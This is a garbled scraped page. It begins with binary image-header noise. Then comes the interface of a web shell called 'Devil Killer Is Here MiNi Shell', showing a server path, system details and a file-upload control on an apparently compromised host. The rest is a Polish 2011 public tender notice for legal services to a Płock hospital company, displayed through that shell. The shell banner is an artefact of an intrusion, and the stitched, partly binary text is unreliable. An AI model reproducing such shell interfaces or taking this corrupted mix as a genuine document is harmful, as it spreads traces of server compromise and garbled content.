JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/445844-N-2011.html

<p class="kh_header"><b>Płock: ŚWIADCZENIE OBSŁUGI PRAWNEJ NA RZECZ PŁOCKIEGO ZAKŁADU OPIEKI ZDROWOTNEJ SP. Z O.O.</b><br>
<b>Numer ogłoszenia: 445844 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o. , ul. Kościuszki 28, 09-402 Płock, woj. mazowieckie, tel. 024 3645100, 3645124, faks 024 3645102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE OBSŁUGI PRAWNEJ NA RZECZ PŁOCKIEGO ZAKŁADU OPIEKI ZDROWOTNEJ SP. Z O.O..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie obsługi prawnej na rzecz Płockiego Zakładu Opieki Zdrowotnej Sp. z o.o. we wszystkich zakresach prawnych jakie wynikają z prowadzonej przez niego działalności gospodarczej, przez okres 24 miesięcy licząc od daty zawarcia umowy, nie wcześniej jednak niż od dnia 01 lutego 2012 roku.
2. Przedmiot zamówienia został podzielony na dwa pakiety:
a. Pakiet nr 1 - organizacja, zarządzanie, zamówienia publiczne
b. Pakiet nr 2 - prawo pracy
Pakiet nr 1 - organizacja, zarządzanie, zamówienia publiczne
Przedmiot zamówienia obejmuje w szczególności:
a. świadczenie obsługi prawnej w zakresie związanym z działalności Zamawiającego, 
a w szczególności w zakresie:
-zagadnień związanych z organizacją i zarządzaniem jednostką Zamawiającego,
-zagadnień związanych z działalnością leczniczą Zamawiającego,
-zagadnień związanych z zamówieniami publicznymi.
b sporządzanie pisemnych opinii prawnych,
c. opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów umów cywilnoprawnych zawieranych z innymi podmiotami,
d. opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów regulacji wewnętrznych, w tym uchwał Zarządu Spółki, Rady Nadzorczej oraz Zwyczajnego Zgromadzenia Wspólników oraz regulaminów, instrukcji, zarządzeń, wymaganych do wprowadzenia zgodnie z przepisami prawa powszechnie obowiązującego,
e. formułowanie pism przedprocesowych określających roszczenia kierowane do osób trzecich oraz przedstawiania na piśmie stanowisk w sprawie zasadności dochodzenia przez Zamawiającego roszczeń, szczególnie na drodze sadowej,
f. pisemne formułowanie projektów odpowiedzi na roszczenia kierowane do Zamawiającego oraz przedstawiania na piśmie stanowisk w sprawie zasadności roszczeń kierowanych do Zamawiającego,
g. udzielanie porad i konsultacji prawnych, 
h. zastępstwo procesowe w sprawach cywilnych, administracyjnych i sądowo-administracyjnych na podstawie odrębnie udzielonych pełnomocnictw,
i. opiniowanie projektów pism,
j. obsługa prawna projektów współfinansowanych ze środków Unii Europejskiej realizowanych przez Płocki Zakład Opieki Zdrowotnej Sp. z o.o.,
k. świadczenie obsługi prawnej, w razie konieczności, podczas posiedzeń Organów Spółki - w dniach i godzinach uzgodnionych z Zamawiającym,
l. poświadczanie odpisów dokumentów za zgodność z okazanym oryginałem w zakresie określonym odrębnymi przepisami,
m. reprezentacja Zamawiającego w postępowaniach przed sądami powszechnymi wszystkich instancji i Sądem Najwyższym, sądami administracyjnymi, organami administracji publicznej, organami egzekucyjnymi, urzędami i instytucjami.
Pakiet nr 2 - prawo pracy
Przedmiot zamówienia obejmuje w szczególności:
a. świadczenie obsługi prawnej w zakresie związanym z działalności Zamawiającego, 
a w szczególności w zakresie:
- zagadnień związanych z organizacją i zarządzaniem jednostką Zamawiającego,
- zagadnień związanych z działalnością leczniczą Zamawiającego,
- zagadnień związanych ze stosunkami pracy,
b. sporządzanie pisemnych opinii prawnych,
c. opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów umów cywilnoprawnych zawieranych z innymi podmiotami,
d. opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów regulacji wewnętrznych, w tym uchwał Zarządu Spółki, Rady Nadzorczej oraz Zwyczajnego Zgromadzenia Wspólników oraz regulaminów, instrukcji, zarządzeń, wymaganych do wprowadzenia zgodnie z przepisami prawa powszechnie obowiązującego,
e. formułowanie pism przedprocesowych określających roszczenia kierowane do osób trzecich oraz przedstawiania na piśmie stanowisk w sprawie zasadności dochodzenia przez Zamawiającego roszczeń, szczególnie na drodze sadowej,
f. pisemne formułowanie projektów odpowiedzi na roszczenia kierowane do Zamawiającego oraz przedstawiania na piśmie stanowisk w sprawie zasadności roszczeń kierowanych do Zamawiającego,
g. udzielanie porad i konsultacji prawnych, 
h. zastępstwo procesowe w sprawach cywilnych, administracyjnych i sądowo-administracyjnych na podstawie odrębnie udzielonych pełnomocnictw,
i. opiniowanie projektów pism,
j. obsługa prawna projektów współfinansowanych ze środków Unii Europejskiej realizowanych przez Płocki Zakład Opieki Zdrowotnej Sp. z o.o.,
k. świadczenie obsługi prawnej, w razie konieczności, podczas posiedzeń Organów Spółki - w dniach i godzinach uzgodnionych z Zamawiającym,
l. poświadczanie odpisów dokumentów za zgodność z okazanym oryginałem w zakresie określonym odrębnymi przepisami,
m. reprezentacja Zamawiającego w postępowaniach przed sądami powszechnymi wszystkich instancji i Sądem Najwyższym, sądami administracyjnymi, organami administracji publicznej, organami egzekucyjnymi, urzędami i instytucjami.
3. Usługi, o których mowa w ust. 2, winny być wykonywane na następujących warunkach:
a. czynności będą wykonywane osobiście przez osobę wykonującą zawód radcy prawnego lub adwokata; z zastrzeżeniem pkt c powierzenie ich wykonania innej osobie wymaga uzgodnienia z Zamawiającym;
b. porady prawne winny być udzielane (formułowane), stosownie do poleceń Zamawiającego, w formie ustnej lub pisemnej;
c. pisemne opinie prawne, stanowiska i opracowania mogą być wykonywane w miejscu działania Kancelarii Wykonawcy, przy czym winny być sporządzone i podpisane przez osobę wykonującą zawód radcy prawnego lub adwokata;
d. termin sporządzenia opinii prawnych, stanowisk i opracowań wynosi nie więcej niż 2 dni, a w sprawach skomplikowanych pod względem prawnym, nie więcej niż 7 dni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do świadczenia obsługi prawnej, co oznacza, że o zamówienie mogą ubiegać się:
-osoby fizyczne posiadające uprawnienia do świadczenia obsługi prawnej w rozumieniu ustawy z dnia 6 lipca 1982 roku o radcach prawnych (Dz. U. z 2010 r. Nr 10, poz. 65 z późn. zm.) albo ustawy z dnia 26 maja 1982 roku - Prawo o adwokaturze (Dz. U. z 2009 r. Nr 146, poz. 1188 z późn. zm.), w postaci tytułu zawodowego radcy prawnego lub adwokata,
-spółki wskazane w art. 8 ust. 1 ustawy z 6 lipca 1982 roku o radcach prawnych (Dz. U. z 2010 r. Nr 10, poz. 65 z późn. zm.), tj. spółki cywilne, jawne, partnerskie, komandytowe lub komandytowo-akcyjne, których wyłącznym przedmiotem działalności jest świadczenie obsługi prawnej,
-zespoły adwokackie i spółki wskazane w art. 4a ustawy z dnia 26 maja 1982 roku - Prawo o adwokaturze (Dz. U. z 2009 r. Nr 146, poz. 1188 z późn. zm.), tj. spółki cywilne, jawne, partnerskie, komandytowe lub komandytowo-akcyjne, których wyłącznym przedmiotem działalności jest świadczenie obsługi prawnej,
- prawnicy zagraniczni posiadający uprawnienia do świadczenia obsługi prawnej na terenie Rzeczpospolitej Polskiej zgodnie z postanowieniami ustawy z dnia z dnia 5 lipca 2002 roku o świadczeniu przez prawników zagranicznych pomocy prawnej na terenie Rzeczpospolitej Polskiej (Dz. U. z 2002 r. Nr 126, poz. 1069 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, który wykaże, że:
- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub nadal wykonuje, co najmniej trzy usługi polegające na świadczeniu obsługi prawnej na rzecz podmiotów leczniczych, w tym jedna usługa polegająca na świadczeniu obsługi prawnej spółki prawa handlowego będącej podmiotem leczniczym, z których każde trwało lub trwa nieprzerwanie przez okres co najmniej dwunastu miesięcy o wartości co najmniej 35 000 PLN brutto każda,
- wykonał minimum dwie opinie prawne - analizy prawne dotyczące podmiotów leczniczych w zakresie objętym danym pakietem przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli wykaże, że dysponuje co najmniej dwoma osobami - Pakiet nr 1, jedną osobą - Pakiet nr 2, która/e będzie/ą uczestniczyć w wykonywaniu zamówienia, która/e spełnia/ją łącznie wszystkie niżej wymienione warunki:
- posiada tytuł adwokata lub radcy prawnego,
- posiada co najmniej 10-letni staż pracy (wykonywania zawodu) jako radca prawny lub adwokat.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, który jest ubezpieczony od odpowiedzialności cywilnej  zgodnie z warunkami określonymi w Rozporządzeniu Ministra Finansów z dnia 11 grudnia 2003 roku w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej radców prawnych (Dz. U. Nr 217, poz. 2135) - minimalna suma gwarancyjna ubezpieczenia OC, w odniesieniu do jednego zdarzenia - równowartość w złotych 50.000 euro.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz Ofertowy - wg Załącznika nr 3 do SIWZ,
2. Wypełniony i podpisany Formularz Cenowy - wg Załącznika nr 4.1-4.2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie  w zakresie obsługi prawnej podmiotów leczniczych - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT, cena netto nie ulegnie zmianie, a cena brutto ulegnie zmianie, w wysokości i w terminie wynikającymi z aktu prawnego wprowadzającego nową stawkę. W takim przypadku wynagrodzenie brutto ulegnie odpowiednio zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/SZPZOZ-Plock<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., ul. Kościuszki 28, 09-402 Płock, Dział Zamówień Publicznych, pok. 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 09:30, miejsce: Siedziba Zamawiającego: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., ul. Kościuszki 28, 09-402 Płock, Dział Zamówień Publicznych, pok. 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja, zarządzanie, zamówienia publiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
a.	świadczenie obsługi prawnej w zakresie związanym z działalności Zamawiającego, 
a w szczególności w zakresie:
-zagadnień związanych z organizacją i zarządzaniem jednostką Zamawiającego,
-zagadnień związanych z działalnością leczniczą Zamawiającego,
-zagadnień związanych z zamówieniami publicznymi.
b.	sporządzanie pisemnych opinii prawnych,
c.	opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów umów cywilnoprawnych zawieranych z innymi podmiotami,
d.	opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów regulacji wewnętrznych, w tym uchwał Zarządu Spółki, Rady Nadzorczej oraz Zwyczajnego Zgromadzenia Wspólników oraz regulaminów, instrukcji, zarządzeń, wymaganych do wprowadzenia zgodnie z przepisami prawa powszechnie obowiązującego,
e.	formułowanie pism przedprocesowych określających roszczenia kierowane do osób trzecich oraz przedstawiania na piśmie stanowisk w sprawie zasadności dochodzenia przez Zamawiającego roszczeń, szczególnie na drodze sadowej,
f.	pisemne formułowanie projektów odpowiedzi na roszczenia kierowane do Zamawiającego oraz przedstawiania na piśmie stanowisk w sprawie zasadności roszczeń kierowanych do Zamawiającego,
g.	udzielanie porad i konsultacji prawnych, 
h.	zastępstwo procesowe w sprawach cywilnych, administracyjnych i sądowo-administracyjnych na podstawie odrębnie udzielonych pełnomocnictw,
i.	opiniowanie projektów pism,
j.	obsługa prawna projektów współfinansowanych ze środków Unii Europejskiej realizowanych przez Płocki Zakład Opieki Zdrowotnej Sp. z o.o.,
k.	świadczenie obsługi prawnej, w razie konieczności, podczas posiedzeń Organów Spółki - 
w dniach i godzinach uzgodnionych z Zamawiającym,
l.	poświadczanie odpisów dokumentów za zgodność z okazanym oryginałem w zakresie określonym odrębnymi przepisami,
m.	reprezentacja Zamawiającego w postępowaniach przed sądami powszechnymi wszystkich instancji i Sądem Najwyższym, sądami administracyjnymi, organami administracji publicznej, organami egzekucyjnymi, urzędami i instytucjami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie  w zakresie obsługi prawnej podmiotów leczniczych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prawo pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:
a.	świadczenie obsługi prawnej w zakresie związanym z działalności Zamawiającego, 
a w szczególności w zakresie:
-zagadnień związanych z organizacją i zarządzaniem jednostką Zamawiającego,
-zagadnień związanych z działalnością leczniczą Zamawiającego,
-zagadnień związanych ze stosunkami pracy,
b.	sporządzanie pisemnych opinii prawnych,
c.	opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów umów cywilnoprawnych zawieranych z innymi podmiotami,
d.	opracowywanie, opiniowanie i parafowanie pod względem formalno-prawnym projektów regulacji wewnętrznych, w tym uchwał Zarządu Spółki, Rady Nadzorczej oraz Zwyczajnego Zgromadzenia Wspólników oraz regulaminów, instrukcji, zarządzeń, wymaganych do wprowadzenia zgodnie z przepisami prawa powszechnie obowiązującego,
e.	formułowanie pism przedprocesowych określających roszczenia kierowane do osób trzecich oraz przedstawiania na piśmie stanowisk w sprawie zasadności dochodzenia przez Zamawiającego roszczeń, szczególnie na drodze sadowej,
f.	pisemne formułowanie projektów odpowiedzi na roszczenia kierowane do Zamawiającego oraz przedstawiania na piśmie stanowisk w sprawie zasadności roszczeń kierowanych do Zamawiającego,
g.	udzielanie porad i konsultacji prawnych, 
h.	zastępstwo procesowe w sprawach cywilnych, administracyjnych i sądowo-administracyjnych na podstawie odrębnie udzielonych pełnomocnictw,
i.	opiniowanie projektów pism,
j.	obsługa prawna projektów współfinansowanych ze środków Unii Europejskiej realizowanych przez Płocki Zakład Opieki Zdrowotnej Sp. z o.o.,
k.	świadczenie obsługi prawnej, w razie konieczności, podczas posiedzeń Organów Spółki - 
w dniach i godzinach uzgodnionych z Zamawiającym,
l.	poświadczanie odpisów dokumentów za zgodność z okazanym oryginałem w zakresie określonym odrębnymi przepisami,
m.	reprezentacja Zamawiającego w postępowaniach przed sądami powszechnymi wszystkich instancji i Sądem Najwyższym, sądami administracyjnymi, organami administracji publicznej, organami egzekucyjnymi, urzędami i instytucjami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
